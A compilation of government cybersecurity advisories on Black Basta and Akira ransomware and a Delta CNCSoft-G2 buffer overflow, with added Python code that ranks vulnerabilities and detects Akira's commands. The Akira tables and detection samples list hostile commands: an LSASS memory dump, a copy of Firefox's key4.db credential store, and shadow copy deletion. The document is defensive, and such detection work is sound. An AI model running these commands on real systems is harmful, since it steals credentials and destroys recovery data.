    • Leverage prioritization methodologies, ratings, and scores. The Common Vulnerability Scoring System (CVSS) assesses the technical severity of vulnerabilities. The Exploit Prediction Scoring System (EPSS) measures the likelihood of exploitation and can help with deciding which vulnerabilities to prioritize. CISA’s Stakeholder-Specific Vulnerability Categorization (SSVC) methodology leverages decision trees to prioritize relevant vulnerabilities into four decisions, Track, Track*, Attend, and Act based on exploitation status, technical impact, mission prevalence, and impacts to safety and public-wellbeing.
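
A worked version of the prioritization the three bullets above describe, as an added example that is not from the advisory or from CISA: findings are ranked by exploitation status first (KEV membership or a high EPSS), then by severity, weighted by mission criticality and exposure. The tier labels borrow SSVC's Track / Track* / Attend / Act names, but the rules are a simplification written here, not CISA's published decision tree. The CVEs are the ones this page discusses, the KEV flags reflect the catalog as of the advisory's date, and the EPSS and CVSS numbers are placeholders.

```python
"""
Added example, not from the advisory: rank findings the way the bullets above
describe.  Tier names reuse SSVC's labels, but decision() is a simplification
written for this example, not CISA's published decision tree.  The findings are
constructed: the CVEs are those discussed on this page, the KEV flags are as of
the advisory's date, and the EPSS/CVSS values are placeholders.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    cve: str
    asset: str
    mission_critical: bool    # asset mapped to a business-critical function
    internet_exposed: bool
    in_kev: bool              # listed in CISA's Known Exploited Vulnerabilities catalog
    epss: float               # EPSS probability, 0..1
    cvss: float               # CVSS base score


TIERS = ["Track", "Track*", "Attend", "Act"]   # lowest to highest urgency
LIKELY_EXPLOITED_EPSS = 0.5                    # assumption: treat this like known exploitation


def decision(f: Finding) -> str:
    exploited = f.in_kev or f.epss >= LIKELY_EXPLOITED_EPSS
    if exploited and f.mission_critical:
        return "Act"
    if exploited or (f.internet_exposed and f.cvss >= 9.0):
        return "Attend"
    if f.cvss >= 7.0 or f.epss >= 0.1:
        return "Attend" if f.mission_critical else "Track*"
    return "Track"


def prioritize(findings):
    """Highest tier first; inside a tier, higher EPSS then higher CVSS first."""
    return sorted(findings, key=lambda f: (-TIERS.index(decision(f)), -f.epss, -f.cvss, f.cve))


# Constructed inventory: same CVE on two assets shows how criticality changes the answer.
SAMPLE_FINDINGS = [
    Finding("CVE-2024-4192", "hmi-eng-ws", False, False, False, 0.01, 7.8),
    Finding("CVE-2024-4192", "hmi-line-3", True, False, False, 0.01, 7.8),
    Finding("CVE-2021-34527", "print01", False, False, True, 0.80, 8.8),
    Finding("CVE-2020-1472", "dc01", True, False, True, 0.90, 10.0),
    Finding("CVE-2024-1709", "screenconnect-01", True, True, True, 0.95, 10.0),
]

if __name__ == "__main__":
    for f in prioritize(SAMPLE_FINDINGS):
        print(f"{decision(f):<7} {f.cve:<15} {f.asset}")
```

The point of the two CVE-2024-4192 rows is that the same CVSS score lands in different tiers once the asset is mapped to a business-critical function, which is what the first bullet asks for.
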
VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 2-6).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES
  1. SentinelOne: Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor
  2. Trend Micro: Ransomware Spotlight: Black Basta
  3. Kroll: Black Basta: Technical Analysis
  4. BlackBerry: Who Is Black Basta?
  5. Palo Alto Networks: Threat Assessment: Black Basta Ransomware
REPORTING

Your organization has no obligation to respond or provide information back to FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.

FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

FBI, CISA, and HHS do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or by calling 1-844-Say-CISA [1-844-729-2472]).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, HHS, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, HHS, and MS-ISAC.

VERSION HISTORY

May 10, 2024: Initial version.


Delta Electronics CNCSoft-G2 DOPSoft DPAX

Tue, 04/30/2024 - 7:34am


1. EXECUTIVE SUMMARY
  • CVSS v4 8.5
  • ATTENTION: Low attack complexity
  • Vendor: Delta Electronics
  • Equipment: CNCSoft-G2 DOPSoft
  • Vulnerability: Stack-based Buffer Overflow
2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Delta Electronics CNCSoft-G2, a Human-Machine Interface (HMI) software, are affected:

  • CNCSoft-G2: Versions 2.0.0.5 (with DOPSoft v5.0.0.93) and prior
3.2 VULNERABILITY OVERVIEW

3.2.1 STACK-BASED BUFFER OVERFLOW CWE-121

Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.

CVE-2024-4192 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2024-4192. A base score of 8.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND
  • CRITICAL INFRASTRUCTURE SECTORS: Energy, Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Taiwan
3.4 RESEARCHER

Natnael Samson working with Trend Micro Zero Day Initiative reported this vulnerability to CISA.

4. MITIGATIONS

Delta Electronics recommends users update to CNCSoft-G2 v2.1.0.4 or later.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY
  • April 30, 2024: Initial Publication

#StopRansomware: Akira Ransomware

Wed, 04/17/2024 - 12:23pm
SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.

Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.

Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension. Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations), interchangeably.

The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

#StopRansomware: Akira Ransomware (PDF, 586.86 KB)

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Initial Access

The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured[1], mostly using known Cisco vulnerabilities [T1190] CVE-2020-3259 and CVE-2023-20269.[2],[3],[4] Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) [T1133], spear phishing [T1566.001][T1566.002], and the abuse of valid credentials [T1078].[4]

Persistence and Discovery

Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [T1136.002] to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named itadm.

According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting[5], to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS) [T1003.001].[6] Akira threat actors also use credential scraping tools [T1003] like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes [T1016] and net Windows commands are used to identify domain controllers [T1018] and gather information on domain trust relationships [T1482].

See Table 1 for a descriptive listing of these tools.

Defense Evasion

Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific “Megazord” ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, “Akira_v2”).

As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver[4] and terminate antivirus-related processes [T1562.001].

Exfiltration and Impact

Akira threat actors leverage tools such as FileZilla, WinRAR [T1560.001], WinSCP, and RClone to exfiltrate data [T1048]. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega [T1537] to connect to exfiltration servers.

Akira threat actors use a double-extortion model [T1657] and encrypt systems [T1486] after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via a .onion URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting.

Encryption

Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange [T1486]. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a .akira or .powerranges extension. To further inhibit system recovery, Akira’s encryptor (w.exe) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems [T1490]. Additionally, a ransom note named fn.txt appears in both the root directory (C:) and each user’s home directory (C:\Users).

Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it’s written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including:

  • -p --encryption_path (targeted file/folder paths)
  • -s --share_file (targeted network drive path)
  • -n --encryption_percent (percentage of encryption)
  • --fork (create a child process for encryption)

The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using “vmonly” and the ability to stop running virtual machines with “stopvm” have also been observed in Akira_v2. After encryption, the Linux ESXi variant may include the file extension “akiranew” or add a ransom note named “akiranew.txt” in directories where files were encrypted with the new nomenclature.

Leveraged Tools

Table 1 lists publicly available tools and applications Akira threat actors have used, including legitimate tools repurposed for their operations. Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 1: Tools Leveraged by Akira Ransomware Actors

  • AdFind: AdFind.exe is used to query and retrieve information from Active Directory.
  • Advanced IP Scanner: A network scanner used to locate all the computers on a network and conduct a scan of their ports. The program shows all network devices, gives access to shared folders, and provides remote control of computers (via RDP and Radmin).
  • AnyDesk: Common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.
  • LaZagne: Allows users to recover stored passwords on Windows, Linux, and OSX systems.
  • PCHunter64: A tool used to acquire detailed process and system information [T1082].[7]
  • PowerShell: A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
  • Mimikatz: Allows users to view and save authentication credentials such as Kerberos tickets.
  • Ngrok: A reverse proxy tool [T1090] used to create a secure tunnel to servers behind firewalls or local machines without a public IP address.
  • RClone: A command line program used to sync files with cloud storage services [T1567.002] such as Mega.
  • SoftPerfect: A network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters.
  • WinRAR: Used to split compromised data into segments and to compress [T1560.001] files into .RAR format for exfiltration.
  • WinSCP: Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Akira threat actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts.

Indicators of Compromise

Disclaimer: Investigation or vetting of these indicators is recommended prior to taking action, such as blocking.

Table 2a: Malicious Files Affiliated with Akira Ransomware (File Name | Hash (SHA-256) | Description)

  • w.exe | d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca | Akira ransomware
  • Win.exe | dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e | Akira ransomware encryptor
  • AnyDesk.exe | bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138 | Remote desktop application
  • Gcapi.dll | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf | DLL file that assists with the execution of AnyDesk.exe
  • Sysmon.exe | 1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386 | Ngrok tool for persistence
  • Config.yml | Varies by use | Ngrok configuration file
  • Rclone.exe | aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 | Exfiltration tool
  • Winscp.rnd | 7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4 | Network file transfer program
  • WinSCP-6.1.2-Setup.exe | 36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c | Network file transfer program
  • Akira_v2 | 3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75 | Akira_v2 ransomware
  • Akira_v2 | 0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c | Akira_v2 ransomware
  • Megazord | ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc | Akira “Megazord” ransomware
  • Megazord | dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198 | Akira “Megazord” ransomware
  • Megazord | 131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07 | Akira “Megazord” ransomware
  • Megazord | 9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c | Akira “Megazord” ransomware
  • Megazord | 9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065 | Akira “Megazord” ransomware
  • Megazord | 2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83 | Akira “Megazord” ransomware
  • Megazord | 7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be | Akira “Megazord” ransomware
  • Megazord | 95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a | Akira “Megazord” ransomware
  • Megazord | 0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d | Akira “Megazord” ransomware
  • Megazord | C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0 | Akira “Megazord” ransomware
  • VeeamHax.exe | aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d | Plaintext credential leaking tool
  • Veeam-Get-Creds.ps1 | 18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88 | PowerShell script for obtaining and decrypting accounts from Veeam servers
  • PowershellKerberos TicketDumper | 5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32 | Kerberos ticket dumping tool from LSA cache
  • sshd.exe | 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 | OpenSSH Backdoor
  • ipscan-3.9.1-setup.exe | 892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0 | Network scanner that scans IP addresses and ports

Table 2b: Malicious Files Affiliated with Akira Ransomware (File Name | Hash (MD5) | Description)

  • winrar-x64-623.exe | 7a647af3c112ad805296a22b2a276e7c | Network file transfer program

Table 3a: Commands Affiliated with Akira Ransomware (Persistence and Discovery)

  • nltest /dclist: [T1018]
  • nltest /DOMAIN_TRUSTS [T1482]
  • net group “Domain admins” /dom [T1069.002]
  • net localgroup “Administrators” /dom [T1069.001]
  • tasklist [T1057]
  • rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full [T1003.001]

Table 3b: Commands Affiliated with Akira Ransomware (Credential Access)

  • cmd.exe /Q /c esentutl.exe /y "C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db" /d "C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db.tmp"

Note: Used for accessing Firefox data.

Table 3c: Commands Affiliated with Akira Ransomware (Impact)

  • powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" [T1490]

MITRE ATT&CK TACTICS AND TECHNIQUES
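The commands in Tables 3a to 3c, turned into detection rules keyed by the ATT&CK IDs those tables assign, together with a review of newly created domain accounts (the itadm account from the Persistence section), as an added example. This is my own Python, not code from the advisory or from any of the tools it names; the event records, host names and the svc_backup creator account are constructed, and the regular expressions are my rendering of the listed commands, so a production rule set would be tuned against real telemetry (tasklist in particular is too common to alert on by itself).

```python
import re

# Rules derived from Tables 3a to 3c of this advisory. The regexes are my own
# rendering of the listed commands (constructed for this example); the technique
# IDs are the ones the tables assign. Table 3b's esentutl command has no ID on
# the page, so it is mapped to None rather than an invented one.
RULES = [
    ("T1018", "nltest domain controller listing",
     re.compile(r"\bnltest(\.exe)?\b.*/dclist", re.I)),
    ("T1482", "nltest domain trust enumeration",
     re.compile(r"\bnltest(\.exe)?\b.*/domain_trusts", re.I)),
    ("T1069.002", "net group Domain Admins query",
     re.compile(r"\bnet1?(\.exe)?\s+group\s+[\"'“”]?domain admins[\"'“”]?\s+/dom", re.I)),
    ("T1069.001", "net localgroup Administrators query",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+[\"'“”]?administrators[\"'“”]?\s+/dom", re.I)),
    ("T1057", "tasklist process listing (noisy; weight low on its own)",
     re.compile(r"\btasklist(\.exe)?\b", re.I)),
    ("T1003.001", "LSASS dump via comsvcs.dll MiniDump",
     re.compile(r"comsvcs\.dll\s*,?\s*minidump", re.I)),
    (None, "esentutl copy of Firefox key4.db (Table 3b, no ID on the page)",
     re.compile(r"\besentutl(\.exe)?\b.*key4\.db", re.I)),
    ("T1490", "shadow copy deletion via WMI",
     re.compile(r"win32_shadowcopy.*remove-wmiobject", re.I)),
]

# Account name the FBI observed Akira actors creating (Persistence section).
KNOWN_ROGUE_ACCOUNT = "itadm"


def classify_command(command_line):
    """Return [(technique_id, rule_name), ...] for every rule the command line matches."""
    return [(tid, name) for tid, name, rx in RULES if rx.search(command_line)]


def scan_events(events):
    """Run the rules over normalised events and return a list of finding dicts.

    Each event is a dict with "type" set to "process" (a process-creation record
    such as Sysmon Event ID 1 or Security Event ID 4688) or "account_created"
    (Security Event ID 4720, "A user account was created").
    """
    findings = []
    for ev in events:
        if ev["type"] == "process":
            for tid, name in classify_command(ev["command_line"]):
                findings.append({"host": ev["host"], "technique": tid,
                                 "rule": name, "evidence": ev["command_line"]})
        elif ev["type"] == "account_created":
            # Every new domain account deserves a check against change records;
            # a name already reported for this actor is called out explicitly.
            note = ("name matches the itadm account reported by the FBI"
                    if ev["account"].lower() == KNOWN_ROGUE_ACCOUNT
                    else "verify against change records")
            findings.append({"host": ev["host"], "technique": "T1136.002",
                             "rule": "new domain account",
                             "evidence": f"{ev['account']} created by {ev['creator']} ({note})"})
    return findings


# Constructed sample events (not real telemetry); command lines follow Table 3.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "command_line": "nltest /dclist:"},
    {"type": "process", "host": "ws01", "command_line": "nltest /DOMAIN_TRUSTS"},
    {"type": "process", "host": "ws01", "command_line": 'net group "Domain admins" /dom'},
    {"type": "process", "host": "ws01", "command_line":
        r"rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump 652 C:\windows\temp\lsass.dmp full"},
    {"type": "process", "host": "srv02", "command_line":
        'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"'},
    {"type": "process", "host": "ws01", "command_line":
        r'cmd.exe /Q /c esentutl.exe /y "C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default-release\key4.db" /d "C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default-release\key4.db.tmp"'},
    {"type": "process", "host": "ws01", "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    {"type": "account_created", "host": "dc01", "account": "itadm", "creator": "svc_backup"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']:6} {str(f['technique']):10} {f['rule']}: {f['evidence'][:70]}")
```

Feed it the command-line field of your process-creation telemetry and the target-account field of 4720 events; the value of the account rule is not the itadm string (an attacker picks any name) but the habit of reviewing every new domain account against a change record, which is the mitigation the advisory lists below.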

See Tables 4 -12 for all referenced Akira threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Initial Access

  • Valid Accounts (T1078): Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access.
  • Exploit Public-Facing Application (T1190): Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems.
  • External Remote Services (T1133): Akira threat actors have used remote access services, such as RDP/VPN connections, to gain initial access.
  • Phishing: Spearphishing Attachment (T1566.001): Akira threat actors use phishing emails with malicious attachments to gain access to networks.
  • Phishing: Spearphishing Link (T1566.002): Akira threat actors use phishing emails with malicious links to gain access to networks.

Table 5: Credential Access

  • OS Credential Dumping (T1003): Akira threat actors use tools like Mimikatz and LaZagne to dump credentials.
  • OS Credential Dumping: LSASS Memory (T1003.001): Akira threat actors attempt to access credential material stored in the process memory of the LSASS.

Table 6: Discovery

  • System Network Configuration Discovery (T1016): Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure.
  • System Information Discovery (T1082): Akira threat actors use tools like PCHunter64 to acquire detailed process and system information.
  • Domain Trust Discovery (T1482): Akira threat actors use the net Windows command to enumerate domain information.
  • Process Discovery (T1057): Akira threat actors use the Tasklist utility to obtain details on running processes via PowerShell.
  • Permission Groups Discovery: Local Groups (T1069.001): Akira threat actors use net localgroup /dom to find local system groups and permission settings.
  • Permission Groups Discovery: Domain Groups (T1069.002): Akira threat actors use the net group /domain command to attempt to find domain level groups and permission settings.
  • Remote System Discovery (T1018): Akira threat actors use nltest /dclist to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network.

Table 7: Persistence

  • Create Account: Domain Account (T1136.002): Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence.

Table 8: Defense Evasion

  • Impair Defenses: Disable or Modify Tools (T1562.001): Akira threat actors use bring-your-own-vulnerable-driver (BYOVD) attacks to disable antivirus software.

Table 9: Command and Control

  • Remote Access Software (T1219): Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems.
  • Proxy (T1090): Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data.

Table 10: Collection

  • Archive Collected Data: Archive via Utility (T1560.001): Akira threat actors use tools like WinRAR to compress files.

Table 11: Exfiltration

  • Exfiltration Over Alternative Protocol (T1048): Akira threat actors use file transfer tools like WinSCP to transfer data.
  • Transfer Data to Cloud Account (T1537): Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfil servers they control.
  • Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002): Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data.

Table 12: Impact

  • Data Encrypted for Impact (T1486): Akira threat actors encrypt data on target systems to interrupt availability to system and network resources.
  • Inhibit System Recovery (T1490): Akira threat actors delete volume shadow copies on Windows systems.
  • Financial Theft (T1657): Akira threat actors use a double-extortion model for financial gain.

MITIGATIONS

Network Defenders

The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S].
  • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring recurring password changes, as these can weaken security [CPG 2.C].
  • Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems. [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
  • Disable unused ports [CPG 2.V].
  • Consider adding an email banner to emails received from outside of your organization [CPG 2.M].
  • Disable hyperlinks in received emails.
  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
